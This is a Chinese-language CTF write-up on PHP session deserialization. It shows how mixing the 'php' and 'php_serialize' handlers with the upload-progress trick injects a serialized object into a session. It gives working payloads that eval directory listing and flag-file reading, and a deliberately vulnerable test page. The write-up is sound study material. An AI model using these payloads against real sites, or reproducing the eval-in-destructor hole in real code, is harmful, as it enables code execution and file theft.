PHP反序列化与Session
0x00前言:
php存储session有三种模式,php_serialize, php, binary
这里着重讨论php_serialize和php的不合理使用导致的安全问题
关于session的存储,java是将用户的session存入内存中,而php则是将session以文件的形式存储在服务器某个tmp文件中,可以在php.ini里面设置session.save_path存储的位置
设置序列化规则则是
注意,php_serialize在5.5版本后新加的一种规则,5.4及之前版本,如果设置成php_serialize会报错
session.serialize_handler = php 一直都在 它是用 |分割
session.serialize_handler = php_serialize 5.5之后启用 它是用serialize反序列化格式分割
首先看session.serialize_handler = php序列化的结果
它的规则是$_SESSION是个数组,数组中的键和值中间用 | 来分割,值如果是数组或对象按照序列化的格式存储
然后看看session.serialize_handler = php_serialize的序列化结果
它是全程按照serialize的格式序列化了$_SESSION这个数组
它比php的格式多了个最前面多了个 "a:2:{ ...." 也就是$_SESSION这个数组有2个元素,还有个区别在于,它的键名也表明了长度和属性,中间用 ; 来隔开键值对
虽然2个序列化格式本身没有问题,但是如果2个混合起用就会造成危害
形成原理是在用session.serialize_handler = php_serialize存储的字符可以引入 | , 再用session.serialize_handler = php格式取出$_SESSION的值时 "|"会被当成键值对的分隔符
比如,我先用php存了个数组,在$_SESSION['b']的值里面加入 | ,并在之后写成一个数组的序列化格式
如果正常的用php_serialize解析,它返回的是$_SESSION['b']是个长度为44的字符串
如果用php进行解析,发现它理解为一个很长的名字的值是一个带了2个元素的数组
0x01一道CTF题目:
题目是道网上常常拿来做例子的一道php反序列化题目
题目连接:http://web.jarvisoj.com:32784/
源码已经给出,如下
<?php //A webshell is wait for you ini_set('session.serialize_handler', 'php'); session_start(); class OowoO { public $mdzz; function __construct() { $this->mdzz = 'phpinfo();'; } function __destruct() { eval($this->mdzz); } } if(isset($_GET['phpinfo'])) { $m = new OowoO(); } else { highlight_string(file_get_contents('index.php')); } ?>
能够查看phpinfo,于是发现全局用的php_serialize进行序列化,而这个页面是以php来进行解析的
那么可以利用上面的理论进行事先准备个$this->mdzz= 'payload' 进行攻击
问题是怎么将payload写入session,这里php有个上传文件的会将文件名写入session的技巧
https://bugs.php.net/bug.php?id=71101
原文意思大致要求满足以下2个条件就会写入到session中
session.upload_progress.enabled = On
上传一个字段的属性名和session.upload_progress.name的值相,这里根据上面的phpinfo信息看得出,值为PHP_SESSION_UPLOAD_PROGRESS,即
name="PHP_SESSION_UPLOAD_PROGRESS"
写好脚本
<html> <head> <title>upload</title> </head> <body> <form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="1" /> <input type="file" name="file" /> <input type="submit" /> </form> </body> </html>
注意这里 "PHP_SESSION_UPLOAD_PROGRESS" 的 value不能为空
这里根据题目的类,需要修改mdzz这个属性,于是写个php生成payload,因为看看phpinfo的禁用函数,能调用系统的函数都被ban了,于是只能用var_dump,scandir和file_get_contents来读取flag
<?php class OowoO { public $mdzz = "var_dump(scandir('./'));"; function __destruct() { eval($this->mdzz); } } $a = new OowoO(); echo serialize($a) . "<br>"; ?>
生成payload
O:5:"OowoO":1:{s:4:"mdzz";s:24:"var_dump(scandir('./'));";}
当然这个是不行的,我们要稍微改一下,"要转义,前面加个|
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:24:\"var_dump(scandir('./'));\";}
先随便传个文件,把包抓下来,把文件名改成我们的payload
能够查看到根目录的情况了
网上有个payload是直接用
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
我因为太菜最先没想到,于是去看了下phpinfo的session的存放位置,有个/opt/lampp/估计是装的的xampp这个集成的环境,而这个集成环境的web页面放在htdocs目录下的
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"var_dump(scandir('/opt/lampp/'));\";}
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:40:\"var_dump(scandir('/opt/lampp/htdocs/'));\";}
看到flag文件了
接下来是读取,这里额外提一句file_put_contents和fie_get_contents能够使用php://filter伪协议,但这里用var_dump导出来,不是文件包含,看下源码就能找打答案
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:89:\"var_dump(file_get_contents('/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php'));\";}
0x03环境复现:
因为最先学习这道题的时候想看看session文件,于是在本地搭建了个环境
<?php ini_set('session.serialize_handler', 'php'); session_start(); var_dump($_SESSION); echo "<br>"; class test { public $wd; function __destruct() { eval($this->wd); } } ?>
最先我用一个文件直接生产用php_serialize规则序列化并直接存在session中
然后访问模拟搭建的页面,漏洞能够利用成功
于是我改用文件上传的形式,结果死活没法生成正确的session
再看看session文件,啥都没写入
这是为什么,想了一晚上,看了看phpinfo的信息,上传保留session的enabled是默认开启的,session.upload_progress.name也是默认
上传的html页面能在上面的ctf题中成功运行,说明不是上传的请求头格式问题
payload如果写入session文件中也能正常触发phpinfo
但是现在的问题是session写不进去,于是估计是配置问题了。
我再读了遍:https://bugs.php.net/bug.php?id=71101
发现它给出它的运行环境的配置,于是我按照它的ini对应的配置,再配了遍自己的php.ini,发现很多配置都是被注释掉的,也就是默认的值
最后成功执行了
session文件也写入了,可以仔细看看写的session文件内容
因为用php解析了,为了使解析格式正确,它直接丢掉了些 },如果正常解析的话,可以看出多了很多键值对,但是正是因为用php解析, |前面的所有字符都当做键名,而后面的payload则被反序列化,造成漏洞利用
再回到为什么之前不行,现在可以运行的问题上,最后我测试了是 session.upload_progress.cleanup这个参数
session.upload_progress.cleanup = Off
这个要为Off或者0,才能将上传的内容保存到session,但是,php默认的是On,所有最先死活传不上去